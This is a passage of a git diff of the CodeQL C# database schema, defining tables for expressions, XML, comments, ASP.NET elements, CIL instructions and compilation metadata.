@sizeof_expr + | @pointer_indirection_expr | @address_of_expr; + +@anonymous_function_expr = @lambda_expr | @anonymous_method_expr; + +@call = @method_invocation_expr | @constructor_init_expr | @operator_invocation_expr + | @delegate_invocation_expr | @object_creation_expr | @call_access_expr + | @local_function_invocation_expr | @function_pointer_invocation_expr; + +@call_access_expr = @property_access_expr | @event_access_expr | @indexer_access_expr; + +@late_bindable_expr = @dynamic_element_access_expr | @dynamic_member_access_expr + | @object_creation_expr | @method_invocation_expr | @operator_invocation_expr; + +@throw_element = @throw_expr | @throw_stmt; + +@implicitly_typeable_object_creation_expr = @object_creation_expr | @explicit_delegate_creation_expr; + +implicitly_typed_array_creation( + unique int id: @array_creation_expr ref); + +explicitly_sized_array_creation( + unique int id: @array_creation_expr ref); + +stackalloc_array_creation( + unique int id: @array_creation_expr ref); + +implicitly_typed_object_creation( + unique int id: @implicitly_typeable_object_creation_expr ref); + +mutator_invocation_mode( + unique int id: @operator_invocation_expr ref, + int mode: int ref /* prefix = 1, postfix = 2*/); + +expr_compiler_generated( + unique int id: @expr ref); + +expr_value( + unique int id: @expr ref, + string value: string ref); + +expr_call( + unique int caller_id: @expr ref, + int target_id: @callable ref); + +expr_access( + unique int accesser_id: @access_expr ref, + int target_id: @accessible ref); + +@accessible = @method | @assignable | @local_function | @namespace; + +expr_location( + unique int id: @expr ref, + int loc: @location ref); + +dynamic_member_name( + unique int id: @late_bindable_expr ref, + string name: string ref); + +@qualifiable_expr = @member_access_expr + | @method_invocation_expr + | @element_access_expr; + +conditional_access( + unique int id: @qualifiable_expr ref); + +expr_argument( + unique int id: @expr ref, + int mode: int ref); + /* mode is the same as params: value = 0, ref = 1, out = 2 */ + +expr_argument_name( + unique int id: @expr ref, + string name: string ref); + +lambda_expr_return_type( + unique int id: @lambda_expr ref, + int type_id: @type_or_ref ref); + +/** CONTROL/DATA FLOW **/ + +@control_flow_element = @stmt | @expr; + +/* XML Files */ + +xmlEncoding ( + unique int id: @file ref, + string encoding: string ref); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/* Comments */ + +commentline( + unique int id: @commentline, + int kind: int ref, + string text: string ref, + string rawtext: string ref); + +case @commentline.kind of + 0 = @singlelinecomment +| 1 = @xmldoccomment +| 2 = @multilinecomment; + +commentline_location( + unique int id: @commentline ref, + int loc: @location ref); + +commentblock( + unique int id : @commentblock); + +commentblock_location( + unique int id: @commentblock ref, + int loc: @location ref); + +commentblock_binding( + int id: @commentblock ref, + int entity: @element ref, + int bindtype: int ref); /* 0: Parent, 1: Best, 2: Before, 3: After */ + +commentblock_child( + int id: @commentblock ref, + int commentline: @commentline ref, + int index: int ref); + +/* ASP.NET */ + +case @asp_element.kind of + 0=@asp_close_tag +| 1=@asp_code +| 2=@asp_comment +| 3=@asp_data_binding +| 4=@asp_directive +| 5=@asp_open_tag +| 6=@asp_quoted_string +| 7=@asp_text +| 8=@asp_xml_directive; + +@asp_attribute = @asp_code | @asp_data_binding | @asp_quoted_string; + +asp_elements( + unique int id: @asp_element, + int kind: int ref, + int loc: @location ref); + +asp_comment_server(unique int comment: @asp_comment ref); +asp_code_inline(unique int code: @asp_code ref); +asp_directive_attribute( + int directive: @asp_directive ref, + int index: int ref, + string name: string ref, + int value: @asp_quoted_string ref); +asp_directive_name( + unique int directive: @asp_directive ref, + string name: string ref); +asp_element_body( + unique int element: @asp_element ref, + string body: string ref); +asp_tag_attribute( + int tag: @asp_open_tag ref, + int index: int ref, + string name: string ref, + int attribute: @asp_attribute ref); +asp_tag_name( + unique int tag: @asp_open_tag ref, + string name: string ref); +asp_tag_isempty(int tag: @asp_open_tag ref); + +/* Common Intermediate Language - CIL */ + +case @cil_instruction.opcode of + 0 = @cil_nop +| 1 = @cil_break +| 2 = @cil_ldarg_0 +| 3 = @cil_ldarg_1 +| 4 = @cil_ldarg_2 +| 5 = @cil_ldarg_3 +| 6 = @cil_ldloc_0 +| 7 = @cil_ldloc_1 +| 8 = @cil_ldloc_2 +| 9 = @cil_ldloc_3 +| 10 = @cil_stloc_0 +| 11 = @cil_stloc_1 +| 12 = @cil_stloc_2 +| 13 = @cil_stloc_3 +| 14 = @cil_ldarg_s +| 15 = @cil_ldarga_s +| 16 = @cil_starg_s +| 17 = @cil_ldloc_s +| 18 = @cil_ldloca_s +| 19 = @cil_stloc_s +| 20 = @cil_ldnull +| 21 = @cil_ldc_i4_m1 +| 22 = @cil_ldc_i4_0 +| 23 = @cil_ldc_i4_1 +| 24 = @cil_ldc_i4_2 +| 25 = @cil_ldc_i4_3 +| 26 = @cil_ldc_i4_4 +| 27 = @cil_ldc_i4_5 +| 28 = @cil_ldc_i4_6 +| 29 = @cil_ldc_i4_7 +| 30 = @cil_ldc_i4_8 +| 31 = @cil_ldc_i4_s +| 32 = @cil_ldc_i4 +| 33 = @cil_ldc_i8 +| 34 = @cil_ldc_r4 +| 35 = @cil_ldc_r8 +| 37 = @cil_dup +| 38 = @cil_pop +| 39 = @cil_jmp +| 40 = @cil_call +| 41 = @cil_calli +| 42 = @cil_ret +| 43 = @cil_br_s +| 44 = @cil_brfalse_s +| 45 = @cil_brtrue_s +| 46 = @cil_beq_s +| 47 = @cil_bge_s +| 48 = @cil_bgt_s +| 49 = @cil_ble_s +| 50 = @cil_blt_s +| 51 = @cil_bne_un_s +| 52 = @cil_bge_un_s +| 53 = @cil_bgt_un_s +| 54 = @cil_ble_un_s +| 55 = @cil_blt_un_s +| 56 = @cil_br +| 57 = @cil_brfalse +| 58 = @cil_brtrue +| 59 = @cil_beq +| 60 = @cil_bge +| 61 = @cil_bgt +| 62 = @cil_ble +| 63 = @cil_blt +| 64 = @cil_bne_un +| 65 = @cil_bge_un +| 66 = @cil_bgt_un +| 67 = @cil_ble_un +| 68 = @cil_blt_un +| 69 = @cil_switch +| 70 = @cil_ldind_i1 +| 71 = @cil_ldind_u1 +| 72 = @cil_ldind_i2 +| 73 = @cil_ldind_u2 +| 74 = @cil_ldind_i4 +| 75 = @cil_ldind_u4 +| 76 = @cil_ldind_i8 +| 77 = @cil_ldind_i +| 78 = @cil_ldind_r4 +| 79 = @cil_ldind_r8 +| 80 = @cil_ldind_ref +| 81 = @cil_stind_ref +| 82 = @cil_stind_i1 +| 83 = @cil_stind_i2 +| 84 = @cil_stind_i4 +| 85 = @cil_stind_i8 +| 86 = @cil_stind_r4 +| 87 = @cil_stind_r8 +| 88 = @cil_add +| 89 = @cil_sub +| 90 = @cil_mul +| 91 = @cil_div +| 92 = @cil_div_un +| 93 = @cil_rem +| 94 = @cil_rem_un +| 95 = @cil_and +| 96 = @cil_or +| 97 = @cil_xor +| 98 = @cil_shl +| 99 = @cil_shr +| 100 = @cil_shr_un +| 101 = @cil_neg +| 102 = @cil_not +| 103 = @cil_conv_i1 +| 104 = @cil_conv_i2 +| 105 = @cil_conv_i4 +| 106 = @cil_conv_i8 +| 107 = @cil_conv_r4 +| 108 = @cil_conv_r8 +| 109 = @cil_conv_u4 +| 110 = @cil_conv_u8 +| 111 = @cil_callvirt +| 112 = @cil_cpobj +| 113 = @cil_ldobj +| 114 = @cil_ldstr +| 115 = @cil_newobj +| 116 = @cil_castclass +| 117 = @cil_isinst +| 118 = @cil_conv_r_un +| 121 = @cil_unbox +| 122 = @cil_throw +| 123 = @cil_ldfld +| 124 = @cil_ldflda +| 125 = @cil_stfld +| 126 = @cil_ldsfld +| 127 = @cil_ldsflda +| 128 = @cil_stsfld +| 129 = @cil_stobj +| 130 = @cil_conv_ovf_i1_un +| 131 = @cil_conv_ovf_i2_un +| 132 = @cil_conv_ovf_i4_un +| 133 = @cil_conv_ovf_i8_un +| 134 = @cil_conv_ovf_u1_un +| 135 = @cil_conv_ovf_u2_un +| 136 = @cil_conv_ovf_u4_un +| 137 = @cil_conv_ovf_u8_un +| 138 = @cil_conv_ovf_i_un +| 139 = @cil_conv_ovf_u_un +| 140 = @cil_box +| 141 = @cil_newarr +| 142 = @cil_ldlen +| 143 = @cil_ldelema +| 144 = @cil_ldelem_i1 +| 145 = @cil_ldelem_u1 +| 146 = @cil_ldelem_i2 +| 147 = @cil_ldelem_u2 +| 148 = @cil_ldelem_i4 +| 149 = @cil_ldelem_u4 +| 150 = @cil_ldelem_i8 +| 151 = @cil_ldelem_i +| 152 = @cil_ldelem_r4 +| 153 = @cil_ldelem_r8 +| 154 = @cil_ldelem_ref +| 155 = @cil_stelem_i +| 156 = @cil_stelem_i1 +| 157 = @cil_stelem_i2 +| 158 = @cil_stelem_i4 +| 159 = @cil_stelem_i8 +| 160 = @cil_stelem_r4 +| 161 = @cil_stelem_r8 +| 162 = @cil_stelem_ref +| 163 = @cil_ldelem +| 164 = @cil_stelem +| 165 = @cil_unbox_any +| 179 = @cil_conv_ovf_i1 +| 180 = @cil_conv_ovf_u1 +| 181 = @cil_conv_ovf_i2 +| 182 = @cil_conv_ovf_u2 +| 183 = @cil_conv_ovf_i4 +| 184 = @cil_conv_ovf_u4 +| 185 = @cil_conv_ovf_i8 +| 186 = @cil_conv_ovf_u8 +| 194 = @cil_refanyval +| 195 = @cil_ckinfinite +| 198 = @cil_mkrefany +| 208 = @cil_ldtoken +| 209 = @cil_conv_u2 +| 210 = @cil_conv_u1 +| 211 = @cil_conv_i +| 212 = @cil_conv_ovf_i +| 213 = @cil_conv_ovf_u +| 214 = @cil_add_ovf +| 215 = @cil_add_ovf_un +| 216 = @cil_mul_ovf +| 217 = @cil_mul_ovf_un +| 218 = @cil_sub_ovf +| 219 = @cil_sub_ovf_un +| 220 = @cil_endfinally +| 221 = @cil_leave +| 222 = @cil_leave_s +| 223 = @cil_stind_i +| 224 = @cil_conv_u +| 65024 = @cil_arglist +| 65025 = @cil_ceq +| 65026 = @cil_cgt +| 65027 = @cil_cgt_un +| 65028 = @cil_clt +| 65029 = @cil_clt_un +| 65030 = @cil_ldftn +| 65031 = @cil_ldvirtftn +| 65033 = @cil_ldarg +| 65034 = @cil_ldarga +| 65035 = @cil_starg +| 65036 = @cil_ldloc +| 65037 = @cil_ldloca +| 65038 = @cil_stloc +| 65039 = @cil_localloc +| 65041 = @cil_endfilter +| 65042 = @cil_unaligned +| 65043 = @cil_volatile +| 65044 = @cil_tail +| 65045 = @cil_initobj +| 65046 = @cil_constrained +| 65047 = @cil_cpblk +| 65048 = @cil_initblk +| 65050 = @cil_rethrow +| 65052 = @cil_sizeof +| 65053 = @cil_refanytype +| 65054 = @cil_readonly +; + +// CIL ignored instructions + +@cil_ignore = @cil_nop | @cil_break | @cil_volatile | @cil_unaligned; + +// CIL local/parameter/field access + +@cil_ldarg_any = @cil_ldarg_0 | @cil_ldarg_1 | @cil_ldarg_2 | @cil_ldarg_3 | @cil_ldarg_s | @cil_ldarga_s | @cil_ldarg | @cil_ldarga; +@cil_starg_any = @cil_starg | @cil_starg_s; + +@cil_ldloc_any = @cil_ldloc_0 | @cil_ldloc_1 | @cil_ldloc_2 | @cil_ldloc_3 | @cil_ldloc_s | @cil_ldloca_s | @cil_ldloc | @cil_ldloca; +@cil_stloc_any = @cil_stloc_0 | @cil_stloc_1 | @cil_stloc_2 | @cil_stloc_3 | @cil_stloc_s | @cil_stloc; + +@cil_ldfld_any = @cil_ldfld | @cil_ldsfld | @cil_ldsflda | @cil_ldflda; +@cil_stfld_any = @cil_stfld | @cil_stsfld; + +@cil_local_access = @cil_stloc_any | @cil_ldloc_any; +@cil_arg_access = @cil_starg_any | @cil_ldarg_any; +@cil_read_access = @cil_ldloc_any | @cil_ldarg_any | @cil_ldfld_any; +@cil_write_access = @cil_stloc_any | @cil_starg_any | @cil_stfld_any; + +@cil_stack_access = @cil_local_access | @cil_arg_access; +@cil_field_access = @cil_ldfld_any | @cil_stfld_any; + +@cil_access = @cil_read_access | @cil_write_access; + +// CIL constant/literal instructions + +@cil_ldc_i = @cil_ldc_i4_any | @cil_ldc_i8; + +@cil_ldc_i4_any = @cil_ldc_i4_m1 | @cil_ldc_i4_0 | @cil_ldc_i4_1 | @cil_ldc_i4_2 | @cil_ldc_i4_3 | + @cil_ldc_i4_4 | @cil_ldc_i4_5 | @cil_ldc_i4_6 | @cil_ldc_i4_7 | @cil_ldc_i4_8 | @cil_ldc_i4_s | @cil_ldc_i4; + +@cil_ldc_r = @cil_ldc_r4 | @cil_ldc_r8; + +@cil_literal = @cil_ldnull | @cil_ldc_i | @cil_ldc_r | @cil_ldstr; + +// Control flow + +@cil_conditional_jump = @cil_binary_jump | @cil_unary_jump; +@cil_binary_jump = @cil_beq_s | @cil_bge_s | @cil_bgt_s | @cil_ble_s | @cil_blt_s | + @cil_bne_un_s | @cil_bge_un_s | @cil_bgt_un_s | @cil_ble_un_s | @cil_blt_un_s | + @cil_beq | @cil_bge | @cil_bgt | @cil_ble | @cil_blt | + @cil_bne_un | @cil_bge_un | @cil_bgt_un | @cil_ble_un | @cil_blt_un; +@cil_unary_jump = @cil_brfalse_s | @cil_brtrue_s | @cil_brfalse | @cil_brtrue | @cil_switch; +@cil_unconditional_jump = @cil_br | @cil_br_s | @cil_leave_any; +@cil_leave_any = @cil_leave | @cil_leave_s; +@cil_jump = @cil_unconditional_jump | @cil_conditional_jump; + +// CIL call instructions + +@cil_call_any = @cil_jmp | @cil_call | @cil_calli | @cil_tail | @cil_callvirt | @cil_newobj; + +// CIL expression instructions + +@cil_expr = @cil_literal | @cil_binary_expr | @cil_unary_expr | @cil_call_any | @cil_read_access | + @cil_newarr | @cil_ldtoken | @cil_sizeof | + @cil_ldftn | @cil_ldvirtftn | @cil_localloc | @cil_mkrefany | @cil_refanytype | @cil_arglist | @cil_dup; + +@cil_unary_expr = + @cil_conversion_operation | @cil_unary_arithmetic_operation | @cil_unary_bitwise_operation| + @cil_ldlen | @cil_isinst | @cil_box | @cil_ldobj | @cil_castclass | @cil_unbox_any | + @cil_ldind | @cil_unbox; + +@cil_conversion_operation = + @cil_conv_i1 | @cil_conv_i2 | @cil_conv_i4 | @cil_conv_i8 | + @cil_conv_u1 | @cil_conv_u2 | @cil_conv_u4 | @cil_conv_u8 | + @cil_conv_ovf_i | @cil_conv_ovf_i_un | @cil_conv_ovf_i1 | @cil_conv_ovf_i1_un | + @cil_conv_ovf_i2 | @cil_conv_ovf_i2_un | @cil_conv_ovf_i4 | @cil_conv_ovf_i4_un | + @cil_conv_ovf_i8 | @cil_conv_ovf_i8_un | @cil_conv_ovf_u | @cil_conv_ovf_u_un | + @cil_conv_ovf_u1 | @cil_conv_ovf_u1_un | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_ovf_u4 | @cil_conv_ovf_u4_un | @cil_conv_ovf_u8 | @cil_conv_ovf_u8_un | + @cil_conv_r4 | @cil_conv_r8 | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_i | @cil_conv_u | @cil_conv_r_un; + +@cil_ldind = @cil_ldind_i | @cil_ldind_i1 | @cil_ldind_i2 | @cil_ldind_i4 | @cil_ldind_i8 | + @cil_ldind_r4 | @cil_ldind_r8 | @cil_ldind_ref | @cil_ldind_u1 | @cil_ldind_u2 | @cil_ldind_u4; + +@cil_stind = @cil_stind_i | @cil_stind_i1 | @cil_stind_i2 | @cil_stind_i4 | @cil_stind_i8 | + @cil_stind_r4 | @cil_stind_r8 | @cil_stind_ref; + +@cil_bitwise_operation = @cil_binary_bitwise_operation | @cil_unary_bitwise_operation; + +@cil_binary_bitwise_operation = @cil_and | @cil_or | @cil_xor | @cil_shr | @cil_shr | @cil_shr_un | @cil_shl; + +@cil_binary_arithmetic_operation = @cil_add | @cil_sub | @cil_mul | @cil_div | @cil_div_un | + @cil_rem | @cil_rem_un | @cil_add_ovf | @cil_add_ovf_un | @cil_mul_ovf | @cil_mul_ovf_un | + @cil_sub_ovf | @cil_sub_ovf_un; + +@cil_unary_bitwise_operation = @cil_not; + +@cil_binary_expr = @cil_binary_arithmetic_operation | @cil_binary_bitwise_operation | @cil_read_array | @cil_comparison_operation; + +@cil_unary_arithmetic_operation = @cil_neg; + +@cil_comparison_operation = @cil_cgt_un | @cil_ceq | @cil_cgt | @cil_clt | @cil_clt_un; + +// Elements that retrieve an address of something +@cil_read_ref = @cil_ldloca_s | @cil_ldarga_s | @cil_ldflda | @cil_ldsflda | @cil_ldelema; + +// CIL array instructions + +@cil_read_array = + @cil_ldelem | @cil_ldelema | @cil_ldelem_i1 | @cil_ldelem_ref | @cil_ldelem_i | + @cil_ldelem_i1 | @cil_ldelem_i2 | @cil_ldelem_i4 | @cil_ldelem_i8 | @cil_ldelem_r4 | + @cil_ldelem_r8 | @cil_ldelem_u1 | @cil_ldelem_u2 | @cil_ldelem_u4; + +@cil_write_array = @cil_stelem | @cil_stelem_ref | + @cil_stelem_i | @cil_stelem_i1 | @cil_stelem_i2 | @cil_stelem_i4 | @cil_stelem_i8 | + @cil_stelem_r4 | @cil_stelem_r8; + +@cil_throw_any = @cil_throw | @cil_rethrow; + +#keyset[impl, index] +cil_instruction( + unique int id: @cil_instruction, + int opcode: int ref, + int index: int ref, + int impl: @cil_method_implementation ref); + +cil_jump( + unique int instruction: @cil_jump ref, + int target: @cil_instruction ref); + +cil_access( + unique int instruction: @cil_instruction ref, + int target: @cil_accessible ref); + +cil_value( + unique int instruction: @cil_literal ref, + string value: string ref); + +#keyset[instruction, index] +cil_switch( + int instruction: @cil_switch ref, + int index: int ref, + int target: @cil_instruction ref); + +cil_instruction_location( + unique int id: @cil_instruction ref, + int loc: @location ref); + +cil_type_location( + int id: @cil_type ref, + int loc: @location ref); + +cil_method_location( + int id: @cil_method ref, + int loc: @location ref); + +@cil_namespace = @namespace; + +@cil_type_container = @cil_type | @cil_namespace | @cil_method; + +case @cil_type.kind of + 0 = @cil_valueorreftype +| 1 = @cil_typeparameter +| 2 = @cil_array_type +| 3 = @cil_pointer_type +| 4 = @cil_function_pointer_type +; + +cil_type( + unique int id: @cil_type, + string name: string ref, + int kind: int ref, + int parent: @cil_type_container ref, + int sourceDecl: @cil_type ref); + +cil_pointer_type( + unique int id: @cil_pointer_type ref, + int pointee: @cil_type ref); + +cil_array_type( + unique int id: @cil_array_type ref, + int element_type: @cil_type ref, + int rank: int ref); + +cil_function_pointer_return_type( + unique int id: @cil_function_pointer_type ref, + int return_type: @cil_type ref); + +cil_method( + unique int id: @cil_method, + string name: string ref, + int parent: @cil_type ref, + int return_type: @cil_type ref); + +cil_method_source_declaration( + unique int method: @cil_method ref, + int source: @cil_method ref); + +cil_method_implementation( + unique int id: @cil_method_implementation, + int method: @cil_method ref, + int location: @assembly ref); + +cil_implements( + int id: @cil_method ref, + int decl: @cil_method ref); + +#keyset[parent, name] +cil_field( + unique int id: @cil_field, + int parent: @cil_type ref, + string name: string ref, + int field_type: @cil_type ref); + +@cil_element = @cil_instruction | @cil_declaration | @cil_handler | @cil_attribute | @cil_namespace; +@cil_named_element = @cil_declaration | @cil_namespace; +@cil_declaration = @cil_variable | @cil_method | @cil_type | @cil_member; +@cil_accessible = @cil_declaration; +@cil_variable = @cil_field | @cil_stack_variable; +@cil_stack_variable = @cil_local_variable | @cil_parameter; +@cil_member = @cil_method | @cil_type | @cil_field | @cil_property | @cil_event; +@cil_custom_modifier_receiver = @cil_method | @cil_property | @cil_parameter | @cil_field | @cil_function_pointer_type; +@cil_parameterizable = @cil_method | @cil_function_pointer_type; +@cil_has_type_annotation = @cil_stack_variable | @cil_property | @cil_method | @cil_function_pointer_type; + +#keyset[parameterizable, index] +cil_parameter( + unique int id: @cil_parameter, + int parameterizable: @cil_parameterizable ref, + int index: int ref, + int param_type: @cil_type ref); + +cil_parameter_in(unique int id: @cil_parameter ref); +cil_parameter_out(unique int id: @cil_parameter ref); + +cil_setter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +#keyset[id, modifier] +cil_custom_modifiers( + int id: @cil_custom_modifier_receiver ref, + int modifier: @cil_type ref, + int kind: int ref); // modreq: 1, modopt: 0 + +cil_type_annotation( + int id: @cil_has_type_annotation ref, + int annotation: int ref); + +cil_getter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +cil_adder(unique int event: @cil_event ref, + int method: @cil_method ref); + +cil_remover(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_raiser(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_property( + unique int id: @cil_property, + int parent: @cil_type ref, + string name: string ref, + int property_type: @cil_type ref); + +#keyset[parent, name] +cil_event(unique int id: @cil_event, + int parent: @cil_type ref, + string name: string ref, + int event_type: @cil_type ref); + +#keyset[impl, index] +cil_local_variable( + unique int id: @cil_local_variable, + int impl: @cil_method_implementation ref, + int index: int ref, + int var_type: @cil_type ref); + +cil_function_pointer_calling_conventions( + int id: @cil_function_pointer_type ref, + int kind: int ref); + +// CIL handlers (exception handlers etc). + +case @cil_handler.kind of + 0 = @cil_catch_handler +| 1 = @cil_filter_handler +| 2 = @cil_finally_handler +| 4 = @cil_fault_handler +; + +#keyset[impl, index] +cil_handler( + unique int id: @cil_handler, + int impl: @cil_method_implementation ref, + int index: int ref, + int kind: int ref, + int try_start: @cil_instruction ref, + int try_end: @cil_instruction ref, + int handler_start: @cil_instruction ref); + +cil_handler_filter( + unique int id: @cil_handler ref, + int filter_start: @cil_instruction ref); + +cil_handler_type( + unique int id: @cil_handler ref, + int catch_type: @cil_type ref); + +@cil_controlflow_node = @cil_entry_point | @cil_instruction; + +@cil_entry_point = @cil_method_implementation | @cil_handler; + +@cil_dataflow_node = @cil_instruction | @cil_variable | @cil_method; + +cil_method_stack_size( + unique int method: @cil_method_implementation ref, + int size: int ref); + +// CIL modifiers + +cil_public(int id: @cil_member ref); +cil_private(int id: @cil_member ref); +cil_protected(int id: @cil_member ref); +cil_internal(int id: @cil_member ref); +cil_static(int id: @cil_member ref); +cil_sealed(int id: @cil_member ref); +cil_virtual(int id: @cil_method ref); +cil_abstract(int id: @cil_member ref); +cil_class(int id: @cil_type ref); +cil_interface(int id: @cil_type ref); +cil_security(int id: @cil_member ref); +cil_requiresecobject(int id: @cil_method ref); +cil_specialname(int id: @cil_method ref); +cil_newslot(int id: @cil_method ref); + +cil_base_class(unique int id: @cil_type ref, int base: @cil_type ref); +cil_base_interface(int id: @cil_type ref, int base: @cil_type ref); +cil_enum_underlying_type(unique int id: @cil_type ref, int underlying: @cil_type ref); + +#keyset[unbound, index] +cil_type_parameter( + int unbound: @cil_member ref, + int index: int ref, + int param: @cil_typeparameter ref); + +#keyset[bound, index] +cil_type_argument( + int bound: @cil_member ref, + int index: int ref, + int t: @cil_type ref); + +// CIL type parameter constraints + +cil_typeparam_covariant(int tp: @cil_typeparameter ref); +cil_typeparam_contravariant(int tp: @cil_typeparameter ref); +cil_typeparam_class(int tp: @cil_typeparameter ref); +cil_typeparam_struct(int tp: @cil_typeparameter ref); +cil_typeparam_new(int tp: @cil_typeparameter ref); +cil_typeparam_constraint(int tp: @cil_typeparameter ref, int supertype: @cil_type ref); + +// CIL attributes + +cil_attribute( + unique int attributeid: @cil_attribute, + int element: @cil_declaration ref, + int constructor: @cil_method ref); + +#keyset[attribute_id, param] +cil_attribute_named_argument( + int attribute_id: @cil_attribute ref, + string param: string ref, + string value: string ref); + +#keyset[attribute_id, index] +cil_attribute_positional_argument( + int attribute_id: @cil_attribute ref, + int index: int ref, + string value: string ref); + + +// Common .Net data model covering both C# and CIL + +// Common elements +@dotnet_element = @element | @cil_element; +@dotnet_named_element = @named_element | @cil_named_element; +@dotnet_callable = @callable | @cil_method; +@dotnet_variable = @variable | @cil_variable; +@dotnet_field = @field | @cil_field; +@dotnet_parameter = @parameter | @cil_parameter; +@dotnet_declaration = @declaration | @cil_declaration; +@dotnet_member = @member | @cil_member; +@dotnet_event = @event | @cil_event; +@dotnet_property = @property | @cil_property | @indexer; +@dotnet_parameterizable = @parameterizable | @cil_parameterizable; + +// Common types +@dotnet_type = @type | @cil_type; +@dotnet_call = @call | @cil_call_any; +@dotnet_throw = @throw_element | @cil_throw_any; +@dotnet_valueorreftype = @cil_valueorreftype | @value_or_ref_type | @cil_array_type | @void_type; +@dotnet_typeparameter = @type_parameter | @cil_typeparameter; +@dotnet_array_type = @array_type | @cil_array_type; +@dotnet_pointer_type = @pointer_type | @cil_pointer_type; +@dotnet_type_parameter = @type_parameter | @cil_typeparameter; +@dotnet_generic = @dotnet_valueorreftype | @dotnet_callable; + +// Attributes +@dotnet_attribute = @attribute | @cil_attribute; + +// Expressions +@dotnet_expr = @expr | @cil_expr; + +// Literals +@dotnet_literal = @literal_expr | @cil_literal; +@dotnet_string_literal = @string_literal_expr | @cil_ldstr; +@dotnet_int_literal = @integer_literal_expr | @cil_ldc_i; +@dotnet_float_literal = @float_literal_expr | @cil_ldc_r; +@dotnet_null_literal = @null_literal_expr | @cil_ldnull; + +@metadata_entity = @cil_method | @cil_type | @cil_field | @cil_property | @field | @property | + @callable | @value_or_ref_type | @void_type; + +#keyset[entity, location] +metadata_handle(int entity : @metadata_entity ref, int location: @assembly ref, int handle: int ref) diff --git a/csharp/downgrades/1136957c0b3c73a7798ae42645c361e813295393/semmlecode.csharp.dbscheme b/csharp/downgrades/1136957c0b3c73a7798ae42645c361e813295393/semmlecode.csharp.dbscheme new file mode 100644 index 00000000000..d0fba103f7d --- /dev/null +++ b/csharp/downgrades/1136957c0b3c73a7798ae42645c361e813295393/semmlecode.csharp.dbscheme @@ -0,0 +1,2069 @@ +/* This is a dummy line to alter the dbscheme, so we can make a database upgrade + * without actually changing any of the dbscheme predicates. It contains a date + * to allow for such updates in the future as well. + * + * 2021-07-14 + * + * DO NOT remove this comment carelessly, since it can revert the dbscheme back to a + * previously seen state (matching a previously seen SHA), which would make the upgrade + * mechanism not work properly. + */ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * csc f1.cs f2.cs f3.cs + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | --compiler + * 1 | *path to compiler* + * 2 | f1.cs + * 3 | f2.cs + * 4 | f3.cs + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The source files that are compiled by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.cs + * 1 | f2.cs + * 2 | f3.cs + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The references used by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs /r:ref1.dll /r:ref2.dll /r:ref3.dll + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | ref1.dll + * 1 | ref2.dll + * 2 | ref3.dll + */ +#keyset[id, num] +compilation_referencing_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + unique int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +extractor_messages( + unique int id: @extractor_message, + int severity: int ref, + string origin : string ref, + string text : string ref, + string entity : string ref, + int location: @location_default ref, + string stack_trace : string ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. + */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +compilation_assembly( + unique int id : @compilation ref, + int assembly: @assembly ref 